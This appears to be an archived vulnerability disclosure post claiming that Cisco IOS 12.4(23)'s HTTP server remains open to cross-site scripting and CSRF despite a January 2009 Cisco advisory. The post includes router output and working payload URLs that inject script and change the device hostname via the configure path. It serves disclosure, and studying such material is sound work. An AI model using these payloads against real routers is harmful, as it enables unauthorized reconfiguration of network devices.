Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Cisco :: va2526.htm

Cisco IOS XSS/CSRF Vulnerability



Cisco IOS XSS/CSRF Vulnerability
Cisco IOS XSS/CSRF Vulnerability



There was a Cisco Product Security Incident Response Team (PSIRT)=0D
advisory recently concerning some XSS/CSRF holes in the IOS..=0D
=0D
quote{=0D
=0D
Document ID: 98605=0D
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml=0D 
Revision 1.0=0D
For Public Release 2009 January 14 1600 UTC (GMT)=0D
Cisco Response:=0D
"Two separate Cisco IOS=AE Hypertext Transfer Protocol (HTTP) cross-site=0D
scripting (XSS) vulnerabilities have been reported to Cisco [...]=0D
This response covers two separate cross-site scripting vulnerabilities=0D
within the Cisco IOS Hypertext Transfer Protocol (HTTP) server=0D
(including HTTP secure server - here after referred to as purely HTTP=0D
Server) and applies to all Cisco products that run Cisco IOS Software=0D
versions 11.0 through 12.4 with the HTTP server enabled.=0D
=0D
};=0D
=0D
According to this advisory these holes were patched in 12.4(15)T8 and=0D
12.4(23).=0D
=0D
However i found that the Cisco IOS ( 12.4(23) ) HTTP Server is still=0D
prone to multiple cross-site scripting vulnerabilities because it fails=0D
to sufficiently sanitize user-supplied data.=0D
The attacker may leverage these issues to execute arbitrary script code=0D
in the browser of an unsuspecting user in the context of the affected site.=0D
=0D
Proof of concept:=0D
=0D
=0D
furchtbar#sh ver | i IOS=0D
Cisco IOS Software, C2600 Software (C2600-ADVSECURITYK9-M), Version=0D
12.4(23), RELEASE SOFTWARE (fc1)=0D
furchtbar#show ip http server status | include status=0D
HTTP server status: Enabled=0D
HTTP secure server status: Enabled=0D
furchtbar#sh ip int br | i up=0D
FastEthernet0/0            192.168.1.2     YES NVRAM =0D
up                    up      =0D
=0D
...=0D
=0D
[XSS]=0D
=0D
http://192.168.1.2/level/15/exec/-/"> onload=alert("bug")>=0D 
http://192.168.1.2/level/15/exec/-/"> onload=alert("bug")>=0D 
=0D
http://192.168.1.2/exec/"> onload="alert('bug');">=0D 
=0D
[CSRF]=0D
=0D
http://192.168.1.2/level/15/exec/-/"> 
onload=window.location='http://192.168.1.2/level/15/configure/-/hostname/BUGGY/CR'>=0D 
=0D
http://192.168.1.2/exec/"> 
=0D">src="http://192.168.1.2/level/15/configure/-/hostname/BUGGY/CR">=0D 
=0D
=0D
=0D
Best Regards,=0D
=0D
Zloss=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH